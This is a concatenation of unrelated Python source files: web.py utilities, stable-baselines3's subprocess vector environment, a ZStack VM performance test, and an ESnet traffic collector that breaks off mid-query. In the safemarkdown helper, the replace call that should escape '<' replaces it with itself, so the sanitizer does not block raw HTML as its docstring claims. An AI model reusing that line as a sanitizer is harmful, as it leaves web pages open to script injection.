<Storage {'x': <Storage {'value': 'a'}>}>
>>> storify({'x': storage(value='a')}, _unicode=True)
<Storage {'x': u'a'}>
"""
_unicode = defaults.pop('_unicode', False)
def unicodify(s):
if _unicode and isinstance(s, str): return safeunicode(s)
else: return s
def getvalue(x):
if hasattr(x, 'value'):
return unicodify(x.value)
else:
return unicodify(x)
stor = Storage()
for key in requireds + tuple(mapping.keys()):
value = mapping[key]
if isinstance(value, list):
if isinstance(defaults.get(key), list):
value = [getvalue(x) for x in value]
else:
value = value[-1]
if not isinstance(defaults.get(key), dict):
value = getvalue(value)
if isinstance(defaults.get(key), list) and not isinstance(value, list):
value = [value]
setattr(stor, key, value)
for (key, value) in defaults.iteritems():
result = value
if hasattr(stor, key):
result = stor[key]
if value == () and not isinstance(result, tuple):
result = (result,)
setattr(stor, key, result)
return stor
iters = [list, tuple]
import __builtin__
if hasattr(__builtin__, 'set'):
iters.append(set)
if hasattr(__builtin__, 'frozenset'):
iters.append(set)
if sys.version_info < (2,6): # sets module deprecated in 2.6
try:
from sets import Set
iters.append(Set)
except ImportError:
pass
class _hack(tuple): pass
iters = _hack(iters)
iters.__doc__ = """
A list of iterable items (like lists, but not strings). Includes whichever
of lists, tuples, sets, and Sets are available in this version of Python.
"""
def _strips(direction, text, remove):
if direction == 'l':
if text.startswith(remove):
return text[len(remove):]
elif direction == 'r':
if text.endswith(remove):
return text[:-len(remove)]
else:
raise ValueError, "Direction needs to be r or l."
return text
def rstrips(text, remove):
"""
removes the string `remove` from the right of `text`
>>> rstrips("foobar", "bar")
'foo'
"""
return _strips('r', text, remove)
def lstrips(text, remove):
"""
removes the string `remove` from the left of `text`
>>> lstrips("foobar", "foo")
'bar'
"""
return _strips('l', text, remove)
def strips(text, remove):
"""
removes the string `remove` from the both sides of `text`
>>> strips("foobarfoo", "foo")
'bar'
"""
return rstrips(lstrips(text, remove), remove)
def safeunicode(obj, encoding='utf-8'):
r"""
Converts any given object to unicode string.
>>> safeunicode('hello')
u'hello'
>>> safeunicode(2)
u'2'
>>> safeunicode('\xe1\x88\xb4')
u'\u1234'
"""
if isinstance(obj, unicode):
return obj
elif isinstance(obj, str):
return obj.decode(encoding)
else:
if hasattr(obj, '__unicode__'):
return unicode(obj)
else:
return str(obj).decode(encoding)
def safestr(obj, encoding='utf-8'):
r"""
Converts any given object to utf-8 encoded string.
>>> safestr('hello')
'hello'
>>> safestr(u'\u1234')
'\xe1\x88\xb4'
>>> safestr(2)
'2'
"""
if isinstance(obj, unicode):
return obj.encode('utf-8')
elif isinstance(obj, str):
return obj
else:
return str(obj)
# for backward-compatibility
utf8 = safestr
class TimeoutError(Exception): pass
def timelimit(timeout):
"""
A decorator to limit a function to `timeout` seconds, raising `TimeoutError`
if it takes longer.
>>> import time
>>> def meaningoflife():
... time.sleep(.2)
... return 42
>>>
>>> timelimit(.1)(meaningoflife)()
Traceback (most recent call last):
...
TimeoutError: took too long
>>> timelimit(1)(meaningoflife)()
42
_Caveat:_ The function isn't stopped after `timeout` seconds but continues
executing in a separate thread. (There seems to be no way to kill a thread.)
inspired by <http://aspn.activestate.com/ASPN/Cookbook/Python/Recipe/473878>
"""
def _1(function):
def _2(*args, **kw):
class Dispatch(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.result = None
self.error = None
self.setDaemon(True)
self.start()
def run(self):
try:
self.result = function(*args, **kw)
except:
self.error = sys.exc_info()
c = Dispatch()
c.join(timeout)
if c.isAlive():
raise TimeoutError, 'took too long'
if c.error:
raise c.error[0], c.error[1]
return c.result
return _2
return _1
class Memoize:
"""
'Memoizes' a function, caching its return values for each input.
>>> import time
>>> def meaningoflife():
... time.sleep(.2)
... return 42
>>> fastlife = memoize(meaningoflife)
>>> meaningoflife()
42
>>> timelimit(.1)(meaningoflife)()
Traceback (most recent call last):
...
TimeoutError: took too long
>>> fastlife()
42
>>> timelimit(.1)(fastlife)()
42
"""
def __init__(self, func):
self.func = func
self.cache = {}
def __call__(self, *args, **keywords):
key = (args, tuple(keywords.items()))
if key not in self.cache:
self.cache[key] = self.func(*args, **keywords)
return self.cache[key]
memoize = Memoize
re_compile = memoize(re.compile) #@@ threadsafe?
re_compile.__doc__ = """
A memoized version of re.compile.
"""
class _re_subm_proxy:
def __init__(self):
self.match = None
def __call__(self, match):
self.match = match
return ''
def re_subm(pat, repl, string):
"""
Like re.sub, but returns the replacement _and_ the match object.
>>> t, m = re_subm('g(oo+)fball', r'f\\1lish', 'goooooofball')
>>> t
'foooooolish'
>>> m.groups()
('oooooo',)
"""
compiled_pat = re_compile(pat)
proxy = _re_subm_proxy()
compiled_pat.sub(proxy.__call__, string)
return compiled_pat.sub(repl, string), proxy.match
def group(seq, size):
"""
Returns an iterator over a series of lists of length size from iterable.
>>> list(group([1,2,3,4], 2))
[[1, 2], [3, 4]]
"""
if not hasattr(seq, 'next'):
seq = iter(seq)
while True:
yield [seq.next() for i in xrange(size)]
class IterBetter:
"""
Returns an object that can be used as an iterator
but can also be used via __getitem__ (although it
cannot go backwards -- that is, you cannot request
`iterbetter[0]` after requesting `iterbetter[1]`).
>>> import itertools
>>> c = iterbetter(itertools.count())
>>> c[1]
1
>>> c[5]
5
>>> c[3]
Traceback (most recent call last):
...
IndexError: already passed 3
"""
def __init__(self, iterator):
self.i, self.c = iterator, 0
def __iter__(self):
while 1:
yield self.i.next()
self.c += 1
def __getitem__(self, i):
#todo: slices
if i < self.c:
raise IndexError, "already passed "+str(i)
try:
while i > self.c:
self.i.next()
self.c += 1
# now self.c == i
self.c += 1
return self.i.next()
except StopIteration:
raise IndexError, str(i)
iterbetter = IterBetter
def dictreverse(mapping):
"""
Returns a new dictionary with keys and values swapped.
>>> dictreverse({1: 2, 3: 4})
{2: 1, 4: 3}
"""
return dict([(value, key) for (key, value) in mapping.iteritems()])
def dictfind(dictionary, element):
"""
Returns a key whose value in `dictionary` is `element`
or, if none exists, None.
>>> d = {1:2, 3:4}
>>> dictfind(d, 4)
3
>>> dictfind(d, 5)
"""
for (key, value) in dictionary.iteritems():
if element is value:
return key
def dictfindall(dictionary, element):
"""
Returns the keys whose values in `dictionary` are `element`
or, if none exists, [].
>>> d = {1:4, 3:4}
>>> dictfindall(d, 4)
[1, 3]
>>> dictfindall(d, 5)
[]
"""
res = []
for (key, value) in dictionary.iteritems():
if element is value:
res.append(key)
return res
def dictincr(dictionary, element):
"""
Increments `element` in `dictionary`,
setting it to one if it doesn't exist.
>>> d = {1:2, 3:4}
>>> dictincr(d, 1)
3
>>> d[1]
3
>>> dictincr(d, 5)
1
>>> d[5]
1
"""
dictionary.setdefault(element, 0)
dictionary[element] += 1
return dictionary[element]
def dictadd(*dicts):
"""
Returns a dictionary consisting of the keys in the argument dictionaries.
If they share a key, the value from the last argument is used.
>>> dictadd({1: 0, 2: 0}, {2: 1, 3: 1})
{1: 0, 2: 1, 3: 1}
"""
result = {}
for dct in dicts:
result.update(dct)
return result
def listget(lst, ind, default=None):
"""
Returns `lst[ind]` if it exists, `default` otherwise.
>>> listget(['a'], 0)
'a'
>>> listget(['a'], 1)
>>> listget(['a'], 1, 'b')
'b'
"""
if len(lst)-1 < ind:
return default
return lst[ind]
def intget(integer, default=None):
"""
Returns `integer` as an int or `default` if it can't.
>>> intget('3')
3
>>> intget('3a')
>>> intget('3a', 0)
0
"""
try:
return int(integer)
except (TypeError, ValueError):
return default
def datestr(then, now=None):
"""
Converts a (UTC) datetime object to a nice string representation.
>>> from datetime import datetime, timedelta
>>> d = datetime(1970, 5, 1)
>>> datestr(d, now=d)
'0 microseconds ago'
>>> for t, v in {
... timedelta(microseconds=1): '1 microsecond ago',
... timedelta(microseconds=2): '2 microseconds ago',
... -timedelta(microseconds=1): '1 microsecond from now',
... -timedelta(microseconds=2): '2 microseconds from now',
... timedelta(microseconds=2000): '2 milliseconds ago',
... timedelta(seconds=2): '2 seconds ago',
... timedelta(seconds=2*60): '2 minutes ago',
... timedelta(seconds=2*60*60): '2 hours ago',
... timedelta(days=2): '2 days ago',
... }.iteritems():
... assert datestr(d, now=d+t) == v
>>> datestr(datetime(1970, 1, 1), now=d)
'January 1'
>>> datestr(datetime(1969, 1, 1), now=d)
'January 1, 1969'
>>> datestr(datetime(1970, 6, 1), now=d)
'June 1, 1970'
"""
def agohence(n, what, divisor=None):
if divisor: n = n // divisor
out = str(abs(n)) + ' ' + what # '2 day'
if abs(n) != 1: out += 's' # '2 days'
out += ' ' # '2 days '
if n < 0:
out += 'from now'
else:
out += 'ago'
return out # '2 days ago'
oneday = 24 * 60 * 60
if not now: now = datetime.datetime.utcnow()
if type(now).__name__ == "DateTime":
now = datetime.datetime.fromtimestamp(now)
if type(then).__name__ == "DateTime":
then = datetime.datetime.fromtimestamp(then)
delta = now - then
deltaseconds = int(delta.days * oneday + delta.seconds + delta.microseconds * 1e-06)
deltadays = abs(deltaseconds) // oneday
if deltaseconds < 0: deltadays *= -1 # fix for oddity of floor
if deltadays:
if abs(deltadays) < 4:
return agohence(deltadays, 'day')
out = then.strftime('%B %e') # e.g. 'June 13'
if then.year != now.year or deltadays < 0:
out += ', %s' % then.year
return out
if int(deltaseconds):
if abs(deltaseconds) > (60 * 60):
return agohence(deltaseconds, 'hour', 60 * 60)
elif abs(deltaseconds) > 60:
return agohence(deltaseconds, 'minute', 60)
else:
return agohence(deltaseconds, 'second')
deltamicroseconds = delta.microseconds
if delta.days: deltamicroseconds = int(delta.microseconds - 1e6) # datetime oddity
if abs(deltamicroseconds) > 1000:
return agohence(deltamicroseconds, 'millisecond', 1000)
return agohence(deltamicroseconds, 'microsecond')
def numify(string):
"""
Removes all non-digit characters from `string`.
>>> numify('800-555-1212')
'8005551212'
>>> numify('800.555.1212')
'8005551212'
"""
return ''.join([c for c in str(string) if c.isdigit()])
def denumify(string, pattern):
"""
Formats `string` according to `pattern`, where the letter X gets replaced
by characters from `string`.
>>> denumify("8005551212", "(XXX) XXX-XXXX")
'(800) 555-1212'
"""
out = []
for c in pattern:
if c == "X":
out.append(string[0])
string = string[1:]
else:
out.append(c)
return ''.join(out)
def commify(n):
"""
Add commas to an integer `n`.
>>> commify(1)
'1'
>>> commify(123)
'123'
>>> commify(1234)
'1,234'
>>> commify(1234567890)
'1,234,567,890'
>>> commify(None)
>>>
"""
if n is None: return None
r = []
for i, c in enumerate(reversed(str(n))):
if i and (not (i % 3)):
r.insert(0, ',')
r.insert(0, c)
return ''.join(r)
def dateify(datestring):
"""
Formats a numified `datestring` properly.
"""
return denumify(datestring, "XXXX-XX-XX XX:XX:XX")
def nthstr(n):
"""
Formats an ordinal.
Doesn't handle negative numbers.
>>> nthstr(1)
'1st'
>>> nthstr(0)
'0th'
>>> [nthstr(x) for x in [2, 3, 4, 5, 10, 11, 12, 13, 14, 15]]
['2nd', '3rd', '4th', '5th', '10th', '11th', '12th', '13th', '14th', '15th']
>>> [nthstr(x) for x in [91, 92, 93, 94, 99, 100, 101, 102]]
['91st', '92nd', '93rd', '94th', '99th', '100th', '101st', '102nd']
>>> [nthstr(x) for x in [111, 112, 113, 114, 115]]
['111th', '112th', '113th', '114th', '115th']
"""
assert n >= 0
if n % 100 in [11, 12, 13]: return '%sth' % n
return {1: '%sst', 2: '%snd', 3: '%srd'}.get(n % 10, '%sth') % n
def cond(predicate, consequence, alternative=None):
"""
Function replacement for if-else to use in expressions.
>>> x = 2
>>> cond(x % 2 == 0, "even", "odd")
'even'
>>> cond(x % 2 == 0, "even", "odd") + '_row'
'even_row'
"""
if predicate:
return consequence
else:
return alternative
class CaptureStdout:
"""
Captures everything `func` prints to stdout and returns it instead.
>>> def idiot():
... print "foo"
>>> capturestdout(idiot)()
'foo\\n'
**WARNING:** Not threadsafe!
"""
def __init__(self, func):
self.func = func
def __call__(self, *args, **keywords):
from cStringIO import StringIO
# Not threadsafe!
out = StringIO()
oldstdout = sys.stdout
sys.stdout = out
try:
self.func(*args, **keywords)
finally:
sys.stdout = oldstdout
return out.getvalue()
capturestdout = CaptureStdout
class Profile:
"""
Profiles `func` and returns a tuple containing its output
and a string with human-readable profiling information.
>>> import time
>>> out, inf = profile(time.sleep)(.001)
>>> out
>>> inf[:10].strip()
'took 0.0'
"""
def __init__(self, func):
self.func = func
def __call__(self, *args): ##, **kw): kw unused
import hotshot, hotshot.stats, tempfile ##, time already imported
temp = tempfile.NamedTemporaryFile()
prof = hotshot.Profile(temp.name)
stime = time.time()
result = prof.runcall(self.func, *args)
stime = time.time() - stime
prof.close()
import cStringIO
out = cStringIO.StringIO()
stats = hotshot.stats.load(temp.name)
stats.stream = out
stats.strip_dirs()
stats.sort_stats('time', 'calls')
stats.print_stats(40)
stats.print_callers()
x = '\n\ntook '+ str(stime) + ' seconds\n'
x += out.getvalue()
return result, x
profile = Profile
import traceback
# hack for compatibility with Python 2.3:
if not hasattr(traceback, 'format_exc'):
from cStringIO import StringIO
def format_exc(limit=None):
strbuf = StringIO()
traceback.print_exc(limit, strbuf)
return strbuf.getvalue()
traceback.format_exc = format_exc
def tryall(context, prefix=None):
"""
Tries a series of functions and prints their results.
`context` is a dictionary mapping names to values;
the value will only be tried if it's callable.
>>> tryall(dict(j=lambda: True))
j: True
----------------------------------------
results:
True: 1
For example, you might have a file `test/stuff.py`
with a series of functions testing various things in it.
At the bottom, have a line:
if __name__ == "__main__": tryall(globals())
Then you can run `python test/stuff.py` and get the results of
all the tests.
"""
context = context.copy() # vars() would update
results = {}
for (key, value) in context.iteritems():
if not hasattr(value, '__call__'):
continue
if prefix and not key.startswith(prefix):
continue
print key + ':',
try:
r = value()
dictincr(results, r)
print r
except:
print 'ERROR'
dictincr(results, 'ERROR')
print ' ' + '\n '.join(traceback.format_exc().split('\n'))
print '-'*40
print 'results:'
for (key, value) in results.iteritems():
print ' '*2, str(key)+':', value
class ThreadedDict:
"""
Thread local storage.
>>> d = ThreadedDict()
>>> d.x = 1
>>> d.x
1
>>> import threading
>>> def f(): d.x = 2
>>> t = threading.Thread(target=f)
>>> t.start()
>>> t.join()
>>> d.x
1
"""
def __getattr__(self, key):
return getattr(self._getd(), key)
def __setattr__(self, key, value):
return setattr(self._getd(), key, value)
def __delattr__(self, key):
return delattr(self._getd(), key)
def __hash__(self):
return id(self)
def _getd(self):
t = threading.currentThread()
if not hasattr(t, '_d'):
# using __dict__ of thread as thread local storage
t._d = {}
# there could be multiple instances of ThreadedDict.
# use self as key
if self not in t._d:
t._d[self] = storage()
return t._d[self]
threadeddict = ThreadedDict
def autoassign(self, locals):
"""
Automatically assigns local variables to `self`.
>>> self = storage()
>>> autoassign(self, dict(a=1, b=2))
>>> self
<Storage {'a': 1, 'b': 2}>
Generally used in `__init__` methods, as in:
def __init__(self, foo, bar, baz=1): autoassign(self, locals())
"""
for (key, value) in locals.iteritems():
if key == 'self':
continue
setattr(self, key, value)
def to36(q):
"""
Converts an integer to base 36 (a useful scheme for human-sayable IDs).
>>> to36(35)
'z'
>>> to36(119292)
'2k1o'
>>> int(to36(939387374), 36)
939387374
>>> to36(0)
'0'
>>> to36(-393)
Traceback (most recent call last):
...
ValueError: must supply a positive integer
"""
if q < 0: raise ValueError, "must supply a positive integer"
letters = "0123456789abcdefghijklmnopqrstuvwxyz"
converted = []
while q != 0:
q, r = divmod(q, 36)
converted.insert(0, letters[r])
return "".join(converted) or '0'
r_url = re_compile('(?<!\()(http://(\S+))')
def safemarkdown(text):
"""
Converts text to HTML following the rules of Markdown, but blocking any
outside HTML input, so that only the things supported by Markdown
can be used. Also converts raw URLs to links.
(requires [markdown.py](http://webpy.org/markdown.py))
"""
from markdown import markdown
if text:
text = text.replace('<', '<')
# TODO: automatically get page title?
text = r_url.sub(r'<\1>', text)
text = markdown(text)
return text
def sendmail(from_address, to_address, subject, message, headers=None, **kw):
"""
Sends the email message `message` with mail and envelope headers
for from `from_address_` to `to_address` with `subject`.
Additional email headers can be specified with the dictionary
`headers.
If `web.config.smtp_server` is set, it will send the message
to that SMTP server. Otherwise it will look for
`/usr/sbin/sendmail`, the typical location for the sendmail-style
binary. To use sendmail from a different path, set `web.config.sendmail_path`.
"""
try:
import webapi
except ImportError:
webapi = Storage(config=Storage())
if headers is None: headers = {}
cc = kw.get('cc', [])
bcc = kw.get('bcc', [])
def listify(x):
if not isinstance(x, list):
return [safestr(x)]
else:
return [safestr(a) for a in x]
from_address = safestr(from_address)
to_address = listify(to_address)
cc = listify(cc)
bcc = listify(bcc)
recipients = to_address + cc + bcc
headers = dictadd({
'MIME-Version': '1.0',
'Content-Type': 'text/plain; charset=UTF-8',
'Content-Disposition': 'inline',
'From': from_address,
'To': ", ".join(to_address),
'Subject': subject
}, headers)
if cc:
headers['Cc'] = ", ".join(cc)
import email.Utils
from_address = email.Utils.parseaddr(from_address)[1]
recipients = [email.Utils.parseaddr(r)[1] for r in recipients]
message = ('\n'.join([safestr('%s: %s' % x) for x in headers.iteritems()])
+ "\n\n" + safestr(message))
if webapi.config.get('smtp_server'):
server = webapi.config.get('smtp_server')
port = webapi.config.get('smtp_port', 0)
username = webapi.config.get('smtp_username')
password = webapi.config.get('smtp_password')
debug_level = webapi.config.get('smtp_debuglevel', None)
starttls = webapi.config.get('smtp_starttls', False)
import smtplib
smtpserver = smtplib.SMTP(server, port)
if debug_level:
smtpserver.set_debuglevel(debug_level)
if starttls:
smtpserver.ehlo()
smtpserver.starttls()
smtpserver.ehlo()
if username and password:
smtpserver.login(username, password)
smtpserver.sendmail(from_address, recipients, message)
smtpserver.quit()
else:
sendmail = webapi.config.get('sendmail_path', '/usr/sbin/sendmail')
assert not from_address.startswith('-'), 'security'
for r in recipients:
assert not r.startswith('-'), 'security'
if subprocess:
p = subprocess.Popen(['/usr/sbin/sendmail', '-f', from_address] + recipients, stdin=subprocess.PIPE)
p.stdin.write(message)
p.stdin.close()
p.wait()
else:
i, o = os.popen2(["/usr/lib/sendmail", '-f', from_address] + recipients)
i.write(message)
i.close()
o.close()
del i, o
if __name__ == "__main__":
import doctest
doctest.testmod()
|
subproc_vec_env.py
|
import multiprocessing
from collections import OrderedDict
from typing import Sequence
import gym
import numpy as np
from stable_baselines3.common.vec_env.base_vec_env import CloudpickleWrapper, VecEnv
def _worker(remote, parent_remote, env_fn_wrapper):
parent_remote.close()
env = env_fn_wrapper.var()
while True:
try:
cmd, data = remote.recv()
if cmd == "step":
observation, reward, done, info = env.step(data)
if done:
# save final observation where user can get it, then reset
info["terminal_observation"] = observation
observation = env.reset()
remote.send((observation, reward, done, info))
elif cmd == "seed":
remote.send(env.seed(data))
elif cmd == "reset":
observation = env.reset()
remote.send(observation)
elif cmd == "render":
remote.send(env.render(data))
elif cmd == "close":
env.close()
remote.close()
break
elif cmd == "get_spaces":
remote.send((env.observation_space, env.action_space))
elif cmd == "env_method":
method = getattr(env, data[0])
remote.send(method(*data[1], **data[2]))
elif cmd == "get_attr":
remote.send(getattr(env, data))
elif cmd == "set_attr":
remote.send(setattr(env, data[0], data[1]))
else:
raise NotImplementedError(f"`{cmd}` is not implemented in the worker")
except EOFError:
break
class SubprocVecEnv(VecEnv):
"""
Creates a multiprocess vectorized wrapper for multiple environments, distributing each environment to its own
process, allowing significant speed up when the environment is computationally complex.
For performance reasons, if your environment is not IO bound, the number of environments should not exceed the
number of logical cores on your CPU.
.. warning::
Only 'forkserver' and 'spawn' start methods are thread-safe,
which is important when TensorFlow sessions or other non thread-safe
libraries are used in the parent (see issue #217). However, compared to
'fork' they incur a small start-up cost and have restrictions on
global variables. With those methods, users must wrap the code in an
``if __name__ == "__main__":`` block.
For more information, see the multiprocessing documentation.
:param env_fns: Environments to run in subprocesses
:param start_method: method used to start the subprocesses.
Must be one of the methods returned by multiprocessing.get_all_start_methods().
Defaults to 'forkserver' on available platforms, and 'spawn' otherwise.
"""
def __init__(self, env_fns, start_method=None):
self.waiting = False
self.closed = False
n_envs = len(env_fns)
if start_method is None:
# Fork is not a thread safe method (see issue #217)
# but is more user friendly (does not require to wrap the code in
# a `if __name__ == "__main__":`)
forkserver_available = "forkserver" in multiprocessing.get_all_start_methods()
start_method = "forkserver" if forkserver_available else "spawn"
ctx = multiprocessing.get_context(start_method)
self.remotes, self.work_remotes = zip(*[ctx.Pipe() for _ in range(n_envs)])
self.processes = []
for work_remote, remote, env_fn in zip(self.work_remotes, self.remotes, env_fns):
args = (work_remote, remote, CloudpickleWrapper(env_fn))
# daemon=True: if the main process crashes, we should not cause things to hang
process = ctx.Process(target=_worker, args=args, daemon=True) # pytype:disable=attribute-error
process.start()
self.processes.append(process)
work_remote.close()
self.remotes[0].send(("get_spaces", None))
observation_space, action_space = self.remotes[0].recv()
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
def step_async(self, actions):
for remote, action in zip(self.remotes, actions):
remote.send(("step", action))
self.waiting = True
def step_wait(self):
results = [remote.recv() for remote in self.remotes]
self.waiting = False
obs, rews, dones, infos = zip(*results)
return _flatten_obs(obs, self.observation_space), np.stack(rews), np.stack(dones), infos
def seed(self, seed=None):
for idx, remote in enumerate(self.remotes):
remote.send(("seed", seed + idx))
return [remote.recv() for remote in self.remotes]
def reset(self):
for remote in self.remotes:
remote.send(("reset", None))
obs = [remote.recv() for remote in self.remotes]
return _flatten_obs(obs, self.observation_space)
def close(self):
if self.closed:
return
if self.waiting:
for remote in self.remotes:
remote.recv()
for remote in self.remotes:
remote.send(("close", None))
for process in self.processes:
process.join()
self.closed = True
def get_images(self) -> Sequence[np.ndarray]:
for pipe in self.remotes:
# gather images from subprocesses
# `mode` will be taken into account later
pipe.send(("render", "rgb_array"))
imgs = [pipe.recv() for pipe in self.remotes]
return imgs
def get_attr(self, attr_name, indices=None):
"""Return attribute from vectorized environment (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("get_attr", attr_name))
return [remote.recv() for remote in target_remotes]
def set_attr(self, attr_name, value, indices=None):
"""Set attribute inside vectorized environments (see base class)."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("set_attr", (attr_name, value)))
for remote in target_remotes:
remote.recv()
def env_method(self, method_name, *method_args, indices=None, **method_kwargs):
"""Call instance methods of vectorized environments."""
target_remotes = self._get_target_remotes(indices)
for remote in target_remotes:
remote.send(("env_method", (method_name, method_args, method_kwargs)))
return [remote.recv() for remote in target_remotes]
def _get_target_remotes(self, indices):
"""
Get the connection object needed to communicate with the wanted
envs that are in subprocesses.
:param indices: refers to indices of envs.
:return: Connection object to communicate between processes.
"""
indices = self._get_indices(indices)
return [self.remotes[i] for i in indices]
def _flatten_obs(obs, space):
"""
Flatten observations, depending on the observation space.
:param obs: (list<X> or tuple<X> where X is dict<ndarray>, tuple<ndarray> or ndarray) observations.
A list or tuple of observations, one per environment.
Each environment observation may be a NumPy array, or a dict or tuple of NumPy arrays.
:return (OrderedDict<ndarray>, tuple<ndarray> or ndarray) flattened observations.
A flattened NumPy array or an OrderedDict or tuple of flattened numpy arrays.
Each NumPy array has the environment index as its first axis.
"""
assert isinstance(obs, (list, tuple)), "expected list or tuple of observations per environment"
assert len(obs) > 0, "need observations from at least one environment"
if isinstance(space, gym.spaces.Dict):
assert isinstance(space.spaces, OrderedDict), "Dict space must have ordered subspaces"
assert isinstance(obs[0], dict), "non-dict observation for environment with Dict observation space"
return OrderedDict([(k, np.stack([o[k] for o in obs])) for k in space.spaces.keys()])
elif isinstance(space, gym.spaces.Tuple):
assert isinstance(obs[0], tuple), "non-tuple observation for environment with Tuple observation space"
obs_len = len(space.spaces)
return tuple((np.stack([o[i] for o in obs]) for i in range(obs_len)))
else:
return np.stack(obs)
|
test_crt_vm_with_vr_by_max_threads.py
|
'''
New Perf Test for creating KVM VM with SG L3 network.
The created number will depends on the environment variable: ZSTACK_TEST_NUM
This case should use KVM simulator if the real environment doesn't support
so many resource.
@author: Youyk
'''
import zstackwoodpecker.test_util as test_util
import zstackwoodpecker.test_state as test_state
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.operations.resource_operations as res_ops
import zstackwoodpecker.operations.config_operations as con_ops
import zstackwoodpecker.operations.account_operations as acc_ops
import zstackwoodpecker.zstack_test.zstack_test_vm as test_vm_header
import time
import os
import sys
import threading
import random
session_uuid = None
session_to = None
session_mc = None
thread_threshold = os.environ.get('ZSTACK_THREAD_THRESHOLD')
if not thread_threshold:
thread_threshold = 1000
else:
thread_threshold = int(thread_threshold)
exc_info = []
def check_thread_exception():
if exc_info:
info1 = exc_info[0][1]
info2 = exc_info[0][2]
raise info1, None, info2
def create_vm(vm):
try:
vm.create()
except:
exc_info.append(sys.exc_info())
def test():
global session_uuid
global session_to
global session_mc
vm_num = os.environ.get('ZSTACK_TEST_NUM')
if not vm_num:
vm_num = 0
else:
vm_num = int(vm_num)
test_util.test_logger('ZSTACK_THREAD_THRESHOLD is %d' % thread_threshold)
test_util.test_logger('ZSTACK_TEST_NUM is %d' % vm_num)
org_num = vm_num
vm_creation_option = test_util.VmOption()
image_name = os.environ.get('imageName_s')
image_uuid = test_lib.lib_get_image_by_name(image_name).uuid
l3_name = os.environ.get('l3VlanNetworkName1')
conditions = res_ops.gen_query_conditions('name', '=', l3_name)
l3_uuid = res_ops.query_resource_with_num(res_ops.L3_NETWORK, conditions, \
session_uuid, start = 0, limit = 1)[0].uuid
vm_creation_option.set_l3_uuids([l3_uuid])
conditions = res_ops.gen_query_conditions('type', '=', 'UserVm')
instance_offering_uuid = res_ops.query_resource(res_ops.INSTANCE_OFFERING, conditions)[0].uuid
vm_creation_option.set_image_uuid(image_uuid)
vm_creation_option.set_instance_offering_uuid(instance_offering_uuid)
session_uuid = acc_ops.login_as_admin()
#change account session timeout.
session_to = con_ops.change_global_config('identity', 'session.timeout', '720000', session_uuid)
session_mc = con_ops.change_global_config('identity', 'session.maxConcurrent', '10000', session_uuid)
vm_creation_option.set_session_uuid(session_uuid)
vm = test_vm_header.ZstackTestVm()
random_name = random.random()
vm_name = 'multihost_basic_vm_%s' % str(random_name)
vm_creation_option.set_name(vm_name)
while vm_num > 0:
check_thread_exception()
vm.set_creation_option(vm_creation_option)
vm_num -= 1
thread = threading.Thread(target=create_vm, args=(vm,))
while threading.active_count() > thread_threshold:
time.sleep(1)
thread.start()
while threading.active_count() > 1:
time.sleep(0.01)
cond = res_ops.gen_query_conditions('name', '=', vm_name)
vms = res_ops.query_resource_count(res_ops.VM_INSTANCE, cond, session_uuid)
con_ops.change_global_config('identity', 'session.timeout', session_to, session_uuid)
con_ops.change_global_config('identity', 'session.maxConcurrent', session_mc, session_uuid)
acc_ops.logout(session_uuid)
if vms == org_num:
test_util.test_pass('Create %d VMs Test Success' % org_num)
else:
test_util.test_fail('Create %d VMs Test Failed. Only find %d VMs.' % (org_num, vms))
#Will be called only if exception happens in test().
def error_cleanup():
if session_to:
con_ops.change_global_config('identity', 'session.timeout', session_to, session_uuid)
if session_mc:
con_ops.change_global_config('identity', 'session.maxConcurrent', session_mc, session_uuid)
if session_uuid:
acc_ops.logout(session_uuid)
|
ESnetCollector.py
|
#!/usr/bin/python
import os, sys, time
import threading
from threading import Thread
import requests
import json
from datetime import datetime
from elasticsearch import Elasticsearch, exceptions as es_exceptions
from elasticsearch import helpers
lastReconnectionTime = 0
ESserver = sys.argv[1]
ESport = int(sys.argv[2])
APIkey = sys.argv[3]
url = 'https://my.es.net/graphql_token'
auth = None
timeout=10
if len(sys.argv)>=6:
auth = (sys.argv[4], sys.argv[5]) #es-atlas, pass
if len(sys.argv)==7:
timeout = sys.argv[6] #600
class interface:
def __init__(self, name, has_flow=True, tags=[]):
self.name=name
self.has_flow=has_flow
self.tags=tags
self.lastInterfaceUpdate = datetime.utcnow()
self.lastFlowUpdate = datetime.utcnow()
def prnt(self):
print ('interface: ', self.name, 'flow: ', self.has_flow, 'tags:', self.tags)
def getInterfaces():
interfaces=[]
print("Getting interfaces...")
entities_q = """ query { networkEntities(entityType:"LHCONE") { shortName hasFlow tags } } """
try:
r = requests.get(url, dict(query=entities_q), headers=dict(Authorization='Token ' + APIkey))
if r.status_code == 200:
entities = r.json()
# print(entities)
for e in entities['data']['networkEntities']:
interfaces.append(interface(e['shortName'],e['hasFlow'],e['tags']))
else:
print 'got status {0}: {1}'.format(r.status_code, r.content)
except:
print ("Unexpected error in getting Interfaces:", sys.exc_info()[0])
print ("Done.")
for i in interfaces:
i.prnt()
return interfaces
def getInterfaceData(i):
#print ("Loading interface data for: ",i.name)
currenttime = datetime.utcnow()
res=[]
interface_q = """
query {
networkEntity(shortName: "%s", entityType: "LHCONE") {
interfaces (beginTime: "%s", endTime:"%s") { device interface traffic }
}
}""" % (i.name, i.lastInterfaceUpdate.isoformat(), currenttime.isoformat())
try:
r = requests.get(url, dict(query=interface_q), headers=dict(Authorization='Token ' + APIkey))
if r.status_code != 200:
print 'got status {0}: {1}'.format(r.status_code, r.content)
return res
dat = r.json()
ins = dat['data']['networkEntity']['interfaces']
#print(ins)
d = datetime.utcnow()
ind="esnet_"+str(d.year)+"-"+str(d.month)
data = {
'_index': ind,
'_type': 'interface',
'site': i.name
}
for s in ins:
data['device'] = s["device"]
data['interface'] = s["interface"]
st = json.loads(s['traffic'])
traf = st["points"]
data['description'] = st["name"]
for sample in traf:
data['timestamp'] = sample[0]
data['rateIn'] = long(sample[1])
data['rateOut'] = long(sample[2])
res.append(data.copy())
print(i.name,'got',len(res),"interface results.")
i.lastInterfaceUpdate = currenttime
return res
except:
print ("Unexpected error:", sys.exc_info()[0])
return res
def getFlowData(i):
#print ("Loading flow data for: ",i.name)
currenttime = datetime.utcnow()
res=[]
try:
flow_q = """
query {
networkEntity(shortName:"%s", entityType:"LHCONE") {
flow(breakdown: "vpnsite" beginTime: "%s", endTime: "%s") { name traffic }
